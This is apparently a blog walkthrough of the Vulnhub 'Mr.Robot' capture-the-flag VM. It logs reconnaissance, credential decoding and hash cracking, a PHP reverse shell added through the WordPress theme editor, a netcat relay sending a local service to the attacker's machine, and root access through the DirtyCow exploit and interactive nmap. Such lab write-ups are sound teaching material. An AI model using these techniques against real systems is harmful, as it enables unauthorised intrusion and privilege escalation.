[Vulnhub] Mr.Robot - Walkthrough

VM Download page

Victim: 192.168.56.101  
Attacker: 192.168.56.102  

Recon

First a quick nmap scan:

root@kali:~/vulnerhub/mrrobot# nmap -sC -Pn 192.168.56.101

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-29 14:25 EDT  
Nmap scan report for whoismrrobot.com (192.168.56.101)  
Host is up (-0.052s latency).  
Not shown: 997 filtered ports  
PORT    STATE  SERVICE  
22/tcp  closed ssh  
80/tcp  open   http  
|_http-title: Site doesn't have a title (text/html).
443/tcp open   https  
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:C0:2C:86 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds  

Check out the 80 port:

It's an awesome web page which emulates the show.

I tried every command available here and there is anything but useful info. (there are even several videos about Mr.R凸b凸t)


Start to hunt the prey

Check out /robots.txt:

User-agent: *  
fsocity.dic  
key-1-of-3.txt  

There is the first flag:
073403c8a58a1f80d943455fb30724b9

fsocity.dic this must be a dictionary. Let's dirb with this .dic:

root@kali:~/vulnerhub/mrrobot# dirb http://192.168.56.101 fsocity.dic 

-----------------
DIRB v2.22  
By The Dark Raver  
-----------------

START_TIME: Tue Aug 29 16:00:38 2017  
URL_BASE: http://192.168.56.101/  
WORDLIST_FILES: fsocity.dic

-----------------

GENERATED WORDS: 11452                                                         

---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/images/                                   
==> DIRECTORY: http://192.168.56.101/css/                                      
==> DIRECTORY: http://192.168.56.101/image/                                    
+ http://192.168.56.101/license (CODE:200|SIZE:309)                            
==> DIRECTORY: http://192.168.56.101/feed/                                     
==> DIRECTORY: http://192.168.56.101/video/                                    
==> DIRECTORY: http://192.168.56.101/audio/                                    
==> DIRECTORY: http://192.168.56.101/admin/                                    
==> DIRECTORY: http://192.168.56.101/blog/                                     
==> DIRECTORY: http://192.168.56.101/Image/                                    
+ http://192.168.56.101/intro (CODE:200|SIZE:516314)                           
+ http://192.168.56.101/rss (CODE:301|SIZE:0)                                  
+ http://192.168.56.101/login (CODE:302|SIZE:0)                                
+ http://192.168.56.101/readme (CODE:200|SIZE:64)            

...
-----------------
END_TIME: Tue Aug 29 16:34:36 2017  
DOWNLOADED: 12185 - FOUND: 5  

Then I start to browse all those links and check the source code and the network traffic at the same time.

It appears that this is a wordpress (:D) blog. But there is nothing interesting after I fired wpscan with several combs of parameters.

So I kept checking all the urls.
When checking /license, I saw a blank page except the following line:

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?  

But if you scroll down or check the source code, you'll find a key:

do you want a password or something?  
ZWxsaW90OkVSMjgtMDY1Mgo=  
root@kali:~/vulnerhub/mrrobot# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d  
elliot:ER28-0652  

Great, now we have a login credential.

BTW, I checked the password in the .dic and found:

root@kali:~/vulnerhub/mrrobot# grep ER28-0652 fsocity.dic  
ER28-0652  

And later on I reallize that you might be able to find a url like "......./author/elliot", then you can just brute force into it with hydra and that .dic.

But anyway, we are now logined in the wp.


Get a shell

I tried to zip a php-reverse-shell.php and upload the zip file as a plugin and planning to active it to receive the shell but it didn't worked.

Then the super Chao(also known as evilC) came across and gave a big hint: navigate to appearence/editor, click a header.php or something.php on the right side, add your shell php code into the content, update it, then browse the wp blog and enjoy your shell. It works!

$ id    
uid=1(daemon) gid=1(daemon) groups=1(daemon)  
$ w
 19:08:17 up  1:37,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT  
$ uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
$ python -c "import pty;pty.spawn('/bin/bash');"
daemon@linux:/$  

Get robot priviledge

daemon@linux:/home/robot$ ls -l  
ls -l  
total 8  
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5  
cat password.raw-md5  
robot:c3fcd3d76192e4007dfb496cca67e13b  

We need to get the priviledge of robot or root to get the second flag. And there happens be a password file under robot's home. "what a coincident!" :D

root@kali:~/vulnerhub/mrrobot# john --format=raw-md5 pwd.hash --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8  
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])  
Press 'q' or Ctrl-C to abort, almost any other key for status  
abcdefghijklmnopqrstuvwxyz (?)  
1g 0:00:00:00 DONE (2017-08-29 16:49) 6.666g/s 269360p/s 269360c/s 269360C/s abygail..TERRELL  
Use the "--show" option to display all of the cracked passwords reliably  
Session completed  

Cool, now we have robot's passwd!

daemon@linux:/home/robot$ su robot  
su robot  
Password: abcdefghijklmnopqrstuvwxyz  
robot@linux:~$ id  
id  
uid=1002(robot) gid=1002(robot) groups=1002(robot)  
robot@linux:~$ cat key-2-of-3.txt  
cat key-2-of-3.txt  
822c73956184f694993bede3eb39f959  

Second flag: 822c73956184f694993bede3eb39f959


Finding my way to root

robot@linux:/home$ ls -l  
ls -l  
total 4  
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot  
robot@linux:~$ cat /etc/passwd  
cat /etc/passwd  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
libuuid:x:100:101::/var/lib/libuuid:  
syslog:x:101:104::/home/syslog:/bin/false  
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin  
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false  
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false  
mysql:x:1001:1001::/home/mysql:  
varnish:x:999:999::/home/varnish:  
robot:x:1002:1002::/home/robot:  

There are 3 users that have a home but actually there is only one folder under /home which is robot. So I didn't give them too much thoughts.

robot@linux:/home$ netstat -nplt  
netstat -nplt  
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 127.0.0.1:21            0.0.0.0:*               LISTEN      -  
tcp        0      0 127.0.0.1:2812          0.0.0.0:*               LISTEN      -  
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -  
tcp6       0      0 :::443                  :::*                    LISTEN      -  
tcp6       0      0 :::80                   :::*                    LISTEN      -  

There are ftp, mysql and another 2812 port service running, good.

robot@linux:/var$ ls  
ls  
backups  cache    lib  local  lock  log  mail  opt  run  spool  tmp  
robot@linux:/var$ cd mail  
cd mail  
robot@linux:/var/mail$ ls  
ls  
robot@linux:/var/mail$ cd ..  
cd ..  
robot@linux:/var$ ls  
ls  
backups  cache    lib  local  lock  log  mail  opt  run  spool  tmp  
robot@linux:/var$ cd back  
cd backups/  
robot@linux:/var/backups$ ls  
ls  
apt.extended_states.0  group.bak    passwd.bak  
dpkg.status.0           gshadow.bak  shadow.bak  
robot@linux:/var/backups$ cat pass  
cat passwd.bak  
cat: passwd.bak: Permission denied  
robot@linux:/var/backups$ ls -la  
ls -la  
total 356  
drwxr-xr-x  2 root root     4096 Nov 13  2015 .  
drwxr-xr-x 11 root root     4096 Jun 24  2015 ..  
-rw-r--r--  1 root root     7194 Jun 24  2015 apt.extended_states.0
-rw-r--r--  1 root root   331144 Jun 24  2015 dpkg.status.0
-rw-------  1 root root      604 Nov 13  2015 group.bak
-rw-------  1 root shadow    496 Nov 13  2015 gshadow.bak
-rw-------  1 root root     1217 Nov 13  2015 passwd.bak
-rw-------  1 root shadow    885 Nov 13  2015 shadow.bak

Nothing interesting here.

robot@linux:/var/log$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null  
</ -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null  
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/declaration
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/ca-certificates
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/misc
/usr/local/share/sgml/entities
/usr/local/share/fonts
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/lib/python3.4
/usr/local/lib/python3.4/dist-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/var/local
/var/mail
/sbin/unix_chkpwd

Nothing interesting here too except /usr/local/bin/nmap. (wtf? there is a nmap?) So I scaned myself with nmap (just for fun :D)

robot@linux:/var$ nmap localhost  
nmap localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2017-08-29 19:22 UTC  
Interesting ports on localhost (127.0.0.1):  
(The 1658 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE  
21/tcp   open  ftp  
80/tcp   open  http  
443/tcp  open  https  
3306/tcp open  mysql  

But it turns out that it is because my limited knowledge. I could root through this nmap. I'll talk about it at the end.

Back to my recon work.
I tried to connect to ftp server but didn't figure out the username. Then I found this:

robot@linux:/etc$ cat ftpuser  
cat ftpusers  
# /etc/ftpusers: list of users disallowed FTP access. See ftpusers(5).

root  
daemon  
bin  
sys  
sync  
games  
man  
lp  
mail  
news  
uucp  
nobody  

And this:

robot@linux:/etc$ cat vsftpd.all  
cat vsftpd.allowed_users  
bitnamiftp  

Alright, now we have a new target: bitnamiftp. Remember, this name also appeared in /etc/passwd

I tryed mysql and got nothing too there.

Then I nc to 2812 port (because it appeared in the output of netstat), it didn't say anything to me so I suppose it might be a web server. So I send GET / HTTP/1.1 and hit enter twice, I got some html code back.

At this point, I really want to browse the content in a browser because I saw 'mysql and 'ftp' appeared in the shit-like html code.

So I built a tmp proxy (two proxy actually)
on my kali machine:

root@kali:~/vulnerhub/mrrobot# mknod backpipe p  
root@kali:~/vulnerhub/mrrobot# nc -l -k -p 9000 0<backpipe | nc -l -k -p 9001 | tee backpipe  

on the victim machine:

robot@linux:/tmp$ mknod backpipe p  
robot@linux:/tmp$ nc localhost 2812 0<backpipe | nc 192.168.56.102 9001 | tee backpipe  

Then I type localhost:9000 in the browser of my kali, I can browser it now! but I need to rerun those two lines of nc command every time when I click a new link. Because the server would close the connection after one communication but anyway.

Turns out this is a Monit Service Manager page.
I rerun those two lines of nc and browse to apache

Here, ammmmm, I thought I found the name again: bitnamiftp, but it turns out it's not the name username.. which killed me a lot of time to check the /opt/bitnami/ directory.


Actual root

After all those works, I decided to use the dirty way to root it...
(actually I'd been holding this idea back since I saw that uname -a saying the kernel is 3.13.0.)

I tried overlayfs, didn't work, then 'super' dirtyroot, it worked!

robot@linux:/tmp$ ./cowroot  
./cowroot
DirtyCow root privilege escalation  
Backing up /usr/bin/passwd to /tmp/bak  
Size of binary: 47032  
Racing, this may take a while..  
thread stopped  
thread stopped  
/usr/bin/passwd overwritten
Popping root shell.  
Don't forget to restore /tmp/bak  
root@linux:/tmp# id  
id  
uid=0(root) gid=1002(robot) groups=0(root),1002(robot)  
root@linux:/tmp# cd /root  
cd /root  
root@linux:/root# ls  
ls  
firstboot_done  key-3-of-3.txt  
root@linux:/root# cat key  
cat key-3-of-3.txt  
04787ddef27c3dee1ee161b21670b4e4  

Third flag: 04787ddef27c3dee1ee161b21670b4e4
Great! Now I'm done.


nmap to root

if you type nmap --interactive, then !sh, you are root. (god damm it how can I know about this at this late! but thanks god I know it know).
I learned this from this video. Thanks a lot!
But if you type !bash, you won't get a shell and I don't know why. If someone know the reason, please do leave a message and teach me about this.

flag ?∈ hash

After the root, I checked others' walkthrough and someone said it's might be a md5 hash string and I didn't realize that before.
So I tried to decode it with both fsocity.dic and rockyou.txt, and also in md5decrypt.net but didn't get anything interested so I suppose they are just flags rather than hints.

Alright, thanks for watching!
Enjoy!